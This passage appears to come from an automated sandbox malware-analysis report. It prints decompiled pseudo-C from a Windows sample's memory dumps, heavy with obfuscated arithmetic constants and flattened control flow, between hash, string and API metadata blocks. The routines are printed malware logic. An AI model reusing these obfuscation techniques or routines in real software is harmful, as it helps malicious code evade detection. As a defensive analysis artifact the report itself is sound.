                                              				_v556 = _v556 / _t161;
                                              				_v556 = _v556 ^ 0x000048b5;
                                              				_v564 = 0x85d6;
                                              				_v564 = _v564 >> 0xf;
                                              				_v564 = _v564 ^ 0x00007642;
                                              				do {
                                              					while(_t132 != 0x3ec8c14) {
                                              						if(_t132 == 0x4e3e716) {
                                              							_push(_v572);
                                              							_t124 = E0023889D(0x23c9b0, _v544, __eflags);
                                              							_pop(_t134);
                                              							_t150 =  *0x23ca2c; // 0x4d8300
                                              							_t108 = _t150 + 0x230; // 0x700047
                                              							E0022C680(_t108, _v592, _v580, _t134, _v588,  *0x23ca2c, _t124,  &_v524);
                                              							_t169 = _t169 + 0x1c;
                                              							_t127 = E00232025(_v576, _t124, _v568, _v552);
                                              							_t132 = 0x36d909ae;
                                              							continue;
                                              						} else {
                                              							if(_t132 == 0x2942dba3) {
                                              								_t127 = E00232B16(_v548,  &_v524, E002384CC, _v564, 0,  &_v524);
                                              							} else {
                                              								if(_t132 != 0x36d909ae) {
                                              									goto L8;
                                              								} else {
                                              									_t127 = E002228CE( &_v524, _v540, _v560);
                                              									 *_t127 = 0;
                                              									_t132 = 0x2942dba3;
                                              									continue;
                                              								}
                                              							}
                                              						}
                                              						L11:
                                              						return _t127;
                                              					}
                                              					_t132 = 0x4e3e716;
                                              					L8:
                                              					__eflags = _t132 - 0x16e8989b;
                                              				} while (__eflags != 0);
                                              				goto L11;
                                              			}

                                              0x0023222a
                                              0x00232232
                                              0x0023223a
                                              0x0023223f
                                              0x00232247
                                              0x00232253
                                              0x00232256
                                              0x0023225a
                                              0x00232262
                                              0x0023226a
                                              0x0023226f
                                              0x00232277
                                              0x00232277
                                              0x00232285
                                              0x002322ae
                                              0x002322bb
                                              0x002322c0
                                              0x002322dc
                                              0x002322e6
                                              0x002322ec
                                              0x002322f1
                                              0x00232302
                                              0x00232309
                                              0x00000000
                                              0x00232287
                                              0x00232289
                                              0x00232339
                                              0x0023228f
                                              0x00232291
                                              0x00000000
                                              0x00232293
                                              0x0023229f
                                              0x002322a7
                                              0x002322aa
                                              0x00000000
                                              0x002322aa
                                              0x00232291
                                              0x00232289
                                              0x00232341
                                              0x00232348
                                              0x00232348
                                              0x00232310
                                              0x00232312
                                              0x00232312
                                              0x00232312
                                              0x00000000

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: -Q$-Y$Bv$Ov$$&m$&
                                              • API String ID: 0-2434786051
                                              • Opcode ID: 8db37b837f7d7cd696aed7eaac3d03f7606c48e008857dc620f6a8aee9a81163
                                              • Instruction ID: e418d9381e1f2814ff0ba1d5b110c8f83cb717efbe133d3a5a343860d1fa9514
                                              • Opcode Fuzzy Hash: 8db37b837f7d7cd696aed7eaac3d03f7606c48e008857dc620f6a8aee9a81163
                                              • Instruction Fuzzy Hash: AC5178B1118341AFD358DF21C88A91BBBF1FBC4328F509A1DF585462A0C7B58959CF83
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,?,?), ref: 1000220D
                                              • CoTaskMemAlloc.OLE32(?), ref: 10002227
                                              • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000001), ref: 10002250
                                              • StgDeserializePropVariant.PROPSYS(00000000,?,00000000), ref: 10002271
                                              • CoTaskMemFree.OLE32(00000000), ref: 1000227A
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2115600248.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000007.00000002.2115584356.0000000010000000.00000002.00020000.sdmp
                                              • Associated: 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp
                                              • Associated: 00000007.00000002.2115656527.0000000010012000.00000004.00020000.sdmp
                                              • Associated: 00000007.00000002.2115677339.0000000010015000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: BinaryCryptStringTask$AllocDeserializeFreePropVariant
                                              • String ID:
                                              • API String ID: 2967290590-0
                                              • Opcode ID: a0ae73a94a10ec4d1b341bf8883d6d6a7a5478298e4569a97f919236a601242f
                                              • Instruction ID: 3bbe9fb0322c03d3a19eaaaaa04faf6b757ff22615bcfcbc1accf4c01beb8128
                                              • Opcode Fuzzy Hash: a0ae73a94a10ec4d1b341bf8883d6d6a7a5478298e4569a97f919236a601242f
                                              • Instruction Fuzzy Hash: 51116D3AA01129BBEB10DBD48C44FDE77FCDB457A1F010266FE05E2154DA719A408AA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 86%
                                              			E00226754(intOrPtr __ecx, intOrPtr* __edx) {
                                              				char _v520;
                                              				signed int _v524;
                                              				intOrPtr _v528;
                                              				intOrPtr _v532;
                                              				unsigned int _v536;
                                              				signed int _v540;
                                              				signed int _v544;
                                              				signed int _v548;
                                              				signed int _v552;
                                              				signed int _v556;
                                              				signed int _v560;
                                              				signed int _v564;
                                              				signed int _v568;
                                              				signed int _v572;
                                              				void* _t96;
                                              				signed int _t97;
                                              				signed int _t101;
                                              				intOrPtr _t104;
                                              				signed int _t106;
                                              				signed int _t107;
                                              				void* _t108;
                                              				signed int _t123;
                                              				void* _t124;
                                              				intOrPtr* _t128;
                                              				signed int* _t129;
                                              
                                              				_t129 =  &_v572;
                                              				_v524 = _v524 & 0x00000000;
                                              				_v532 = 0x37527f;
                                              				_v528 = 0x4295e6;
                                              				_v536 = 0xee22;
                                              				_v536 = _v536 >> 0xc;
                                              				_v536 = _v536 ^ 0x00007a3a;
                                              				_v544 = 0x8f72;
                                              				_v544 = _v544 | 0xa1a2610a;
                                              				_v544 = _v544 ^ 0xa1a2ad19;
                                              				_v540 = 0xc65b;
                                              				_v540 = _v540 << 9;
                                              				_v540 = _v540 ^ 0x018ca8d5;
                                              				_v572 = 0x4354;
                                              				_v572 = _v572 << 0xd;
                                              				_v572 = _v572 + 0xffff6940;
                                              				_v572 = _v572 * 0x52;
                                              				_t128 = __edx;
                                              				_v572 = _v572 ^ 0xb1ecefd2;
                                              				_v552 = 0x7a0c;
                                              				_t104 = __ecx;
                                              				_v552 = _v552 | 0xfffddbf7;
                                              				_t124 = 0x1663684c;
                                              				_v552 = _v552 ^ 0xfffd8a47;
                                              				_v568 = 0x9348;
                                              				_t106 = 0xf;
                                              				_v568 = _v568 * 0x32;
                                              				_v568 = _v568 + 0x92e3;
                                              				_v568 = _v568 * 0x69;
                                              				_v568 = _v568 ^ 0x0c08d7a0;
                                              				_v556 = 0x9f50;
                                              				_v556 = _v556 / _t106;
                                              				_v556 = _v556 >> 2;
                                              				_v556 = _v556 ^ 0x000022d0;
                                              				_v548 = 0xa3e1;
                                              				_v548 = _v548 >> 0xd;
                                              				_v548 = _v548 ^ 0x000031bd;
                                              				_v564 = 0x55b6;
                                              				_v564 = _v564 >> 1;
                                              				_v564 = _v564 + 0xaf4f;
                                              				_t107 = 0x5e;
                                              				_t123 = _v548;
                                              				_v564 = _v564 / _t107;
                                              				_v564 = _v564 ^ 0x0000417a;
                                              				_v560 = 0xe775;
                                              				_v560 = _v560 << 4;
                                              				_v560 = _v560 << 0xd;
                                              				_v560 = _v560 ^ 0xceea6264;
                                              				do {
                                              					while(_t124 != 0x32e36bf) {
                                              						if(_t124 == 0xcc4ee6e) {
                                              							 *((intOrPtr*)(_t123 + 0x24)) = _t104;
                                              							_t97 =  *0x23ca24; // 0x0
                                              							 *(_t123 + 0x2c) = _t97;
                                              							 *0x23ca24 = _t123;
                                              							return _t97;
                                              						}
                                              						if(_t124 != 0x1663684c) {
                                              							if(_t124 == 0x2308bbf2) {
                                              								return E0022F536(_v548, _v564, _v560, _t123);
                                              							}
                                              							if(_t124 != 0x242d3c72) {
                                              								goto L12;
                                              							} else {
                                              								_push( &_v520);
                                              								_t101 = E002288E5(_t104, _t128);
                                              								asm("sbb esi, esi");
                                              								_t107 = 0x23c910;
                                              								_t124 = ( ~_t101 & 0xe0257acd) + 0x2308bbf2;
                                              								continue;
                                              							}
                                              							L16:
                                              							return _t101;
                                              						}
                                              						_push(_t107);
                                              						_t108 = 0x38;
                                              						_t101 = E00228736(_t108);
                                              						_t123 = _t101;
                                              						_t107 = _t107;
                                              						if(_t123 != 0) {
                                              							_t124 = 0x242d3c72;
                                              							continue;
                                              						}
                                              						goto L16;
                                              					}
                                              					_push(_t107);
                                              					_push(_v556);
                                              					_push( &_v520);
                                              					_push(_v568);
                                              					_push(0);
                                              					_push(_v552);
                                              					_t107 = _v572;
                                              					_push(0);
                                              					_t96 = E0022568E(_t107, 0);
                                              					_t129 =  &(_t129[7]);
                                              					if(_t96 == 0) {
                                              						_t124 = 0x2308bbf2;
                                              						goto L12;
                                              					} else {
                                              						_t124 = 0xcc4ee6e;
                                              						continue;
                                              					}
                                              					goto L16;
                                              					L12:
                                              				} while (_t124 != 0x2bbec955);
                                              				return _t101;
                                              			}

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: :z$r<-$$r<-$$u$zA
                                              • API String ID: 0-4189644680
                                              • Opcode ID: f066dbf450040fc7d509599e2895bfe3fab2f18ed293b4ee76d74ed708169123
                                              • Instruction ID: e7b93e92d52a7646bacef69599931cabe5c08af5f01b445fa3eda287ac8f55be
                                              • Opcode Fuzzy Hash: f066dbf450040fc7d509599e2895bfe3fab2f18ed293b4ee76d74ed708169123
                                              • Instruction Fuzzy Hash: 68518B72518312AFD318CF66D54951BBBE0EBC8758F10491DF4D8A62A0D7B8CA598F83
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 98%
                                              			E0022839D(void* __ecx, void* __edi) {
                                              				char _v4;
                                              				signed int _v8;
                                              				signed int _v12;
                                              				signed int _v16;
                                              				signed int _v20;
                                              				signed int _v24;
                                              				signed int _v28;
                                              				signed int _v32;
                                              				signed int _v36;
                                              				signed int _v40;
                                              				signed int _v44;
                                              				signed int _v48;
                                              				signed int _v52;
                                              				signed int _v56;
                                              				signed int _v60;
                                              				int _t181;
                                              				signed int _t184;
                                              				signed int _t186;
                                              				signed int _t187;
                                              				signed int _t188;
                                              				signed int _t189;
                                              				signed int _t194;
                                              				void* _t211;
                                              				void* _t215;
                                              				signed int _t217;
                                              
                                              				_v28 = 0x5ca2;
                                              				_v28 = _v28 + 0x82ee;
                                              				_v28 = _v28 << 0xb;
                                              				_v28 = _v28 ^ 0x06fc8008;
                                              				_v52 = 0x31f1;
                                              				_v52 = _v52 * 0x4e;
                                              				_t215 = __ecx;
                                              				_t186 = 0x39;
                                              				_v52 = _v52 * 0x4d;
                                              				_v52 = _v52 >> 7;
                                              				_v52 = _v52 ^ 0x00092748;
                                              				_v20 = 0x7fc5;
                                              				_v20 = _v20 * 0x6b;
                                              				_v20 = _v20 << 2;
                                              				_v20 = _v20 ^ 0x00d59d54;
                                              				_v44 = 0xb39b;
                                              				_v44 = _v44 + 0xf7d;
                                              				_v44 = _v44 | 0x2a7b5142;
                                              				_v44 = _v44 + 0xffff17c4;
                                              				_v44 = _v44 ^ 0x2a7aeb0e;
                                              				_v60 = 0x1587;
                                              				_v60 = _v60 | 0x5979cfaa;
                                              				_v60 = _v60 ^ 0xb2ac8491;
                                              				_v60 = _v60 ^ 0x62b96002;
                                              				_v60 = _v60 ^ 0x896c4508;
                                              				_v16 = 0x3e7;
                                              				_v16 = _v16 | 0x10c95731;
                                              				_v16 = _v16 ^ 0x10c93485;
                                              				_v56 = 0x1ea8;
                                              				_v56 = _v56 << 4;
                                              				_v56 = _v56 << 6;
                                              				_v56 = _v56 / _t186;
                                              				_v56 = _v56 ^ 0x0002353c;
                                              				_v12 = 0x5bc0;
                                              				_t187 = 0x13;
                                              				_v12 = _v12 / _t187;
                                              				_v12 = _v12 ^ 0x00001b6c;
                                              				_v48 = 0x8f53;
                                              				_v48 = _v48 ^ 0x72e3c217;
                                              				_v48 = _v48 >> 0xb;
                                              				_v48 = _v48 ^ 0x701cd0a1;
                                              				_v48 = _v48 ^ 0x7012c214;
                                              				_v24 = 0xa180;
                                              				_v24 = _v24 | 0x7584ea2b;
                                              				_v24 = _v24 + 0x36fb;
                                              				_v24 = _v24 ^ 0x75854120;
                                              				_v32 = 0x424b;
                                              				_v32 = _v32 ^ 0x8f16dfbf;
                                              				_v32 = _v32 << 0xc;
                                              				_v32 = _v32 + 0xffffa50c;
                                              				_v32 = _v32 ^ 0x69defe02;
                                              				_v8 = 0x6622;
                                              				_t188 = 0x62;
                                              				_v8 = _v8 / _t188;
                                              				_v8 = _v8 ^ 0x00007651;
                                              				_v36 = 0x9705;
                                              				_t189 = 0x5a;
                                              				_v36 = _v36 * 0x11;
                                              				_v36 = _v36 / _t189;
                                              				_v36 = _v36 | 0xcd876993;
                                              				_v36 = _v36 ^ 0xcd872ff9;
                                              				_v40 = 0x44cf;
                                              				_v40 = _v40 | 0x3f74ab7e;
                                              				_v40 = _v40 << 1;
                                              				_v40 = _v40 + 0x396f;
                                              				_v40 = _v40 ^ 0x7eea1d0a;
                                              				_v4 = E00238C8F(_t189);
                                              				_t217 = _v28 + E00238C8F(_t189) % _v52;
                                              				_t184 = _v20 + E00238C8F(_v52) % _v44;
                                              				if(_t217 != 0) {
                                              					_t211 = _t215;
                                              					_t194 = _t217 >> 1;
                                              					_t215 = _t215 + _t217 * 2;
                                              					_t181 = memset(_t211, 0x2d002d, _t194 << 2);
                                              					asm("adc ecx, ecx");
                                              					memset(_t211 + _t194, _t181, 0);
                                              				}
                                              				E0022D6C9(_v8, _t215, 3, _t184, _v36,  &_v4, _v40);
                                              				 *((short*)(_t215 + _t184 * 2)) = 0;
                                              				return 0;
                                              			}

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: BQ{*$H'$KB$Qv$o9
                                              • API String ID: 0-3657823386
                                              • Opcode ID: cc563c4f974bf484883b2de3c1cdd218fb05770f9d62957089e07ad233a0ec37
                                              • Instruction ID: 20f26d3c78a4ea20b3dc069de4c70fd5cc2c423dacfc5429715945137b21287d
                                              • Opcode Fuzzy Hash: cc563c4f974bf484883b2de3c1cdd218fb05770f9d62957089e07ad233a0ec37
                                              • Instruction Fuzzy Hash: 126111701093419FD348CF25D58A50BBBE1FBC8748F409A1DF1DA96260D7B9DA198F86
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 96%
                                              			E00225B79(intOrPtr __ecx, intOrPtr* __edx) {
                                              				intOrPtr _v4;
                                              				intOrPtr _v8;
                                              				intOrPtr _v12;
                                              				intOrPtr _v16;
                                              				intOrPtr* _v20;
                                              				intOrPtr _v24;
                                              				char _v28;
                                              				intOrPtr _v32;
                                              				intOrPtr _v36;
                                              				intOrPtr _v40;
                                              				signed int _v44;
                                              				signed int _v48;
                                              				signed int _v52;
                                              				signed int _v56;
                                              				signed int _v60;
                                              				signed int _v64;
                                              				signed int _v68;
                                              				signed int _v72;
                                              				signed int _v76;
                                              				signed int _v80;
                                              				signed int _v84;
                                              				signed int _v88;
                                              				signed int _v92;
                                              				signed int _v96;
                                              				unsigned int _v100;
                                              				signed int _v104;
                                              				signed int _v108;
                                              				signed int _v112;
                                              				signed int _v116;
                                              				intOrPtr* _t203;
                                              				intOrPtr _t214;
                                              				intOrPtr _t215;
                                              				intOrPtr _t216;
                                              				intOrPtr _t220;
                                              				intOrPtr _t224;
                                              				void* _t243;
                                              				intOrPtr _t244;
                                              				intOrPtr _t245;
                                              				signed int _t246;
                                              				signed int _t247;
                                              				signed int _t248;
                                              				signed int _t249;
                                              				intOrPtr _t250;
                                              				intOrPtr _t252;
                                              				signed int* _t253;
                                              
                                              				_t215 = __ecx;
                                              				_t253 =  &_v116;
                                              				_v20 = __edx;
                                              				_v32 = __ecx;
                                              				_v12 = 0xafae1;
                                              				_v4 = 0;
                                              				_v8 = 0x46e7c7;
                                              				_v100 = 0x4e85;
                                              				_v100 = _v100 >> 4;
                                              				_v100 = _v100 + 0xa122;
                                              				_v100 = _v100 ^ 0x0000ef7f;
                                              				_v76 = 0x276c;
                                              				_v76 = _v76 + 0xa4ad;
                                              				_v76 = _v76 ^ 0x0000a5d4;
                                              				_v116 = 0xc292;
                                              				_v36 = 0;
                                              				_v116 = _v116 * 0x3d;
                                              				_t243 = 0x5ac7f3d;
                                              				_v116 = _v116 << 0xc;
                                              				_t246 = 0x1a;
                                              				_v116 = _v116 / _t246;
                                              				_v116 = _v116 ^ 0x08d6c610;
                                              				_v96 = 0x57a;
                                              				_v96 = _v96 << 4;
                                              				_v96 = _v96 + 0xde71;
                                              				_v96 = _v96 ^ 0x000109c0;
                                              				_v108 = 0xf9e9;
                                              				_v108 = _v108 >> 0xe;
                                              				_v108 = _v108 + 0xffffa4d5;
                                              				_t247 = 0x1e;
                                              				_v108 = _v108 * 0x3c;
                                              				_v108 = _v108 ^ 0xffeac835;
                                              				_v112 = 0x3502;
                                              				_v112 = _v112 >> 0xc;
                                              				_v112 = _v112 + 0xffffe509;
                                              				_v112 = _v112 >> 0xe;
                                              				_v112 = _v112 ^ 0x0003f015;
                                              				_v64 = 0x4162;
                                              				_v64 = _v64 + 0xffff06ec;
                                              				_v64 = _v64 ^ 0xffff0d41;
                                              				_v68 = 0x29f6;
                                              				_v68 = _v68 | 0xa40114db;
                                              				_v68 = _v68 ^ 0xa4015458;
                                              				_v72 = 0x8ebc;
                                              				_v72 = _v72 | 0xb773f5bd;
                                              				_v72 = _v72 ^ 0xb773df20;
                                              				_v52 = 0x199c;
                                              				_v52 = _v52 + 0x59c9;
                                              				_v52 = _v52 ^ 0x00005d96;
                                              				_v56 = 0x9de2;
                                              				_v56 = _v56 | 0x18b104fc;
                                              				_v56 = _v56 ^ 0x18b18c09;
                                              				_v60 = 0xcf04;
                                              				_v60 = _v60 >> 0xd;
                                              				_v60 = _v60 ^ 0x0000237a;
                                              				_v92 = 0x847f;
                                              				_v92 = _v92 / _t247;
                                              				_v92 = _v92 + 0xfffff45a;
                                              				_v92 = _v92 ^ 0xffffeb4a;
                                              				_v104 = 0x72c3;
                                              				_v104 = _v104 * 0x70;
                                              				_v104 = _v104 >> 0xa;
                                              				_v104 = _v104 + 0xffffb2c0;
                                              				_v104 = _v104 ^ 0xffff9126;
                                              				_v48 = 0x26a;
                                              				_t248 = 0x5f;
                                              				_v48 = _v48 / _t248;
                                              				_v48 = _v48 ^ 0x00002d62;
                                              				_v88 = 0x3bd5;
                                              				_v88 = _v88 | 0xeefd350a;
                                              				_v88 = _v88 >> 1;
                                              				_v88 = _v88 ^ 0x777ec4bd;
                                              				_v44 = 0x124c;
                                              				_v44 = _v44 + 0xffff1b1d;
                                              				_v44 = _v44 ^ 0xffff4aeb;
                                              				_v80 = 0x5ade;
                                              				_t249 = 0x3c;
                                              				_t252 = _v20;
                                              				_t214 = _v20;
                                              				_v80 = _v80 * 0x3a;
                                              				_v80 = _v80 + 0xffff943f;
                                              				_v80 = _v80 ^ 0x0014640e;
                                              				_v84 = 0x6f1d;
                                              				_t250 = _v16;
                                              				_v84 = _v84 / _t249;
                                              				_v84 = _v84 * 0x74;
                                              				_v84 = _v84 ^ 0x0000fa63;
                                              				_t199 = _v40;
                                              				while(_t243 != 0x5ac7f3d) {
                                              					if(_t243 == 0x17993a65) {
                                              						_t216 = E0023023A(_t215, _v96, _v108, _t199, _v112, _t252,  &_v28);
                                              						_t253 =  &(_t253[5]);
                                              						_v36 = _t216;
                                              						if(_t216 == 0) {
                                              							_t244 = _v36;
                                              							goto L19;
                                              						} else {
                                              							_t220 = _v28;
                                              							if(_t220 == 0) {
                                              								goto L15;
                                              							} else {
                                              								_t199 = _v40 + _t220;
                                              								_v40 = _v40 + _t220;
                                              								_t252 = _t252 - _t220;
                                              								if(_t252 != 0) {
                                              									goto L6;
                                              								} else {
                                              									_t224 = _t250 + _t250;
                                              									_push(_t224);
                                              									_push(_t224);
                                              									_v24 = _t224;
                                              									_t245 = E00228736(_t224);
                                              									if(_t245 == 0) {
                                              										goto L15;
                                              									} else {
                                              										E00232674(_v52, _v56, _t250, _t245, _v60, _v92, _t214);
                                              										E0022F536(_v104, _v48, _v88, _t214);
                                              										_t252 = _t250;
                                              										_t199 = _t245 + _t250;
                                              										_t250 = _v24;
                                              										_t253 =  &(_t253[7]);
                                              										_v40 = _t199;
                                              										_t214 = _t245;
                                              										if(_t252 == 0) {
                                              											goto L15;
                                              										} else {
                                              											goto L6;
                                              										}
                                              									}
                                              								}
                                              							}
                                              						}
                                              					} else {
                                              						if(_t243 != 0x1ebe7f62) {
                                              							L14:
                                              							if(_t243 != 0x20fb0f57) {
                                              								continue;
                                              							} else {
                                              								goto L15;
                                              							}
                                              						} else {
                                              							_t250 = 0x10000;
                                              							_push(_t215);
                                              							_push(_t215);
                                              							_t199 = E00228736(0x10000);
                                              							_t214 = _t199;
                                              							if(_t214 == 0) {
                                              								L15:
                                              								_t244 = _v36;
                                              								if(_t244 == 0) {
                                              									L19:
                                              									E0022F536(_v44, _v80, _v84, _t214);
                                              								} else {
                                              									_t203 = _v20;
                                              									 *_t203 = _t214;
                                              									 *((intOrPtr*)(_t203 + 4)) = _t250 - _t252;
                                              								}
                                              							} else {
                                              								_v40 = _t199;
                                              								_t252 = 0x10000;
                                              								L6:
                                              								_t215 = _v32;
                                              								_t243 = 0x17993a65;
                                              								continue;
                                              							}
                                              						}
                                              					}
                                              					return _t244;
                                              				}
                                              				_t243 = 0x1ebe7f62;
                                              				goto L14;
                                              			}

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: b-$bA$l'$z#
                                              • API String ID: 0-3285866504
                                              • Opcode ID: d6ffba5fd41fe7544c9f0c197747c63bcf5a9ecd6bc5aaba3b06836ed62c8ea0
                                              • Instruction ID: d6f77bac02784d7b8fef3fa3db782234c26f73a2cc4e995b2c0cc5498abdf5f8
                                              • Opcode Fuzzy Hash: d6ffba5fd41fe7544c9f0c197747c63bcf5a9ecd6bc5aaba3b06836ed62c8ea0
                                              • Instruction Fuzzy Hash: 27A141B1518782AFD364CF69D48980FBBE1FBC4718F508A1DF5958A260D7B4DA098F83
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 93%
                                              			E002280BA(intOrPtr* __ecx, void* __edx, intOrPtr _a4, signed int* _a8) {
                                              				char _v76;
                                              				signed int _v80;
                                              				signed int _v84;
                                              				signed int _v88;
                                              				signed int _v92;
                                              				unsigned int _v96;
                                              				signed int _v100;
                                              				signed int _v104;
                                              				signed int _v108;
                                              				signed int _v112;
                                              				signed int _v116;
                                              				signed int _v120;
                                              				signed int _v124;
                                              				void* _t96;
                                              				signed int _t110;
                                              				signed int _t115;
                                              				void* _t118;
                                              				intOrPtr* _t132;
                                              				signed int* _t133;
                                              				signed int* _t136;
                                              
                                              				_t133 = _a8;
                                              				_push(_t133);
                                              				_push(_a4);
                                              				_t132 = __ecx;
                                              				_push(__ecx);
                                              				E0022602B(_t96);
                                              				_v96 = 0xfd71;
                                              				_t136 =  &(( &_v124)[4]);
                                              				_v96 = _v96 >> 3;
                                              				_v96 = _v96 ^ 0x00001ccd;
                                              				_t118 = 0x30cb7a4b;
                                              				_v120 = 0xdf4c;
                                              				_t115 = 3;
                                              				_v120 = _v120 * 0xb;
                                              				_v120 = _v120 << 0xb;
                                              				_v120 = _v120 ^ 0x4cc20427;
                                              				_v100 = 0xc552;
                                              				_v100 = _v100 << 1;
                                              				_v100 = _v100 ^ 0x0001a6ce;
                                              				_v124 = 0x18f9;
                                              				_v124 = _v124 ^ 0xb394f6a4;
                                              				_v124 = _v124 | 0xdedfeaf6;
                                              				_v124 = _v124 ^ 0xffdfdfcb;
                                              				_v104 = 0x111;
                                              				_v104 = _v104 / _t115;
                                              				_v104 = _v104 ^ 0x000052be;
                                              				_v108 = 0x5c9e;
                                              				_v108 = _v108 * 0x3f;
                                              				_v108 = _v108 ^ 0x0016b186;
                                              				_v112 = 0xa32c;
                                              				_v112 = _v112 << 3;
                                              				_v112 = _v112 >> 0xd;
                                              				_v112 = _v112 ^ 0x000047d3;
                                              				_v116 = 0x4558;
                                              				_v116 = _v116 >> 0xb;
                                              				_v116 = _v116 ^ 0x0dcfa8f2;
                                              				_v116 = _v116 ^ 0x0dcf9328;
                                              				_v92 = 0xa46a;
                                              				_v92 = _v92 | 0x10f37349;
                                              				_v92 = _v92 ^ 0x10f3c95f;
                                              				_v80 = 0x75fc;
                                              				_v80 = _v80 | 0x150fa2b7;
                                              				_v80 = _v80 ^ 0x150fb0d6;
                                              				_v84 = 0x120;
                                              				_v84 = _v84 << 6;
                                              				_v84 = _v84 ^ 0x00001616;
                                              				_v88 = 0x286e;
                                              				_v88 = _v88 * 0x36;
                                              				_v88 = _v88 ^ 0x0008f8fa;
                                              				do {
                                              					while(_t118 != 0x75fb138) {
                                              						if(_t118 == 0xe7893d9) {
                                              							E0023360F( &_v76, _v112, _v116,  *_t132, _v92);
                                              							_t136 =  &(_t136[3]);
                                              							_t118 = 0x75fb138;
                                              							continue;
                                              						} else {
                                              							if(_t118 == 0xf76409b) {
                                              								_push(_t118);
                                              								_push(_t118);
                                              								_t110 = E00228736(_t133[1]);
                                              								 *_t133 = _t110;
                                              								__eflags = _t110;
                                              								if(__eflags != 0) {
                                              									_t118 = 0x11f2e7ae;
                                              									continue;
                                              								}
                                              							} else {
                                              								if(_t118 == 0x11f2e7ae) {
                                              									E002350F2( &_v76, _v124, _v104, _v108, _t133);
                                              									_t136 =  &(_t136[3]);
                                              									_t118 = 0xe7893d9;
                                              									continue;
                                              								} else {
                                              									if(_t118 == 0x25eae02b) {
                                              										_t133[1] = E002361B8(_t132);
                                              										_t118 = 0xf76409b;
                                              										continue;
                                              									} else {
                                              										if(_t118 != 0x30cb7a4b) {
                                              											goto L14;
                                              										} else {
                                              											 *_t133 = 0;
                                              											_t118 = 0x25eae02b;
                                              											_t133[1] = 0;
                                              											continue;
                                              										}
                                              									}
                                              								}
                                              							}
                                              						}
                                              						goto L15;
                                              					}
                                              					E00227998(_v80, _v84, __eflags, _t132 + 4,  &_v76, _v88);
                                              					_t136 =  &(_t136[3]);
                                              					_t118 = 0x2f2a8f34;
                                              					L14:
                                              					__eflags = _t118 - 0x2f2a8f34;
                                              				} while (__eflags != 0);
                                              				L15:
                                              				__eflags =  *_t133;
                                              				_t95 =  *_t133 != 0;
                                              				__eflags = _t95;
                                              				return 0 | _t95;
                                              			}

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: +%$+%$XE$n(
                                              • API String ID: 0-3838449085
                                              • Opcode ID: 3bf08974b850d916c8291a17b5ded16042347c14e7b4492625b9026cc2aeceda
                                              • Instruction ID: f775f9b0f0e2b2d845c6ae3378dd91cf4e98b52292c6e692ffcfee8cce7138b7
                                              • Opcode Fuzzy Hash: 3bf08974b850d916c8291a17b5ded16042347c14e7b4492625b9026cc2aeceda
                                              • Instruction Fuzzy Hash: 4751667010A742AFD358DF60D88982BBBE1BF84348F505A1DF58696261DBB1CA59CF83
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 96%
                                              			E00238D1C(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
                                              				signed int _v4;
                                              				signed int _v8;
                                              				signed int _v12;
                                              				signed int _v16;
                                              				signed int _v20;
                                              				signed int _v24;
                                              				signed int _v28;
                                              				signed int _v32;
                                              				signed int _v36;
                                              				void* _t108;
                                              				intOrPtr _t110;
                                              				intOrPtr _t120;
                                              				signed int _t121;
                                              				signed int _t122;
                                              				signed int _t123;
                                              				signed int _t124;
                                              				intOrPtr _t127;
                                              				intOrPtr _t128;
                                              				intOrPtr _t144;
                                              				intOrPtr* _t145;
                                              				void* _t146;
                                              				intOrPtr* _t147;
                                              
                                              				_v36 = 0x4ef4;
                                              				_v36 = _v36 + 0xa860;
                                              				_v36 = _v36 | 0x1c77c6a8;
                                              				_t121 = 0x2a;
                                              				_v36 = _v36 / _t121;
                                              				_v36 = _v36 ^ 0x00adf3e3;
                                              				_v16 = 0xcfa4;
                                              				_v16 = _v16 << 0xe;
                                              				_v16 = _v16 ^ 0x33e94134;
                                              				_v24 = 0x2a39;
                                              				_v24 = _v24 ^ 0x66b190f2;
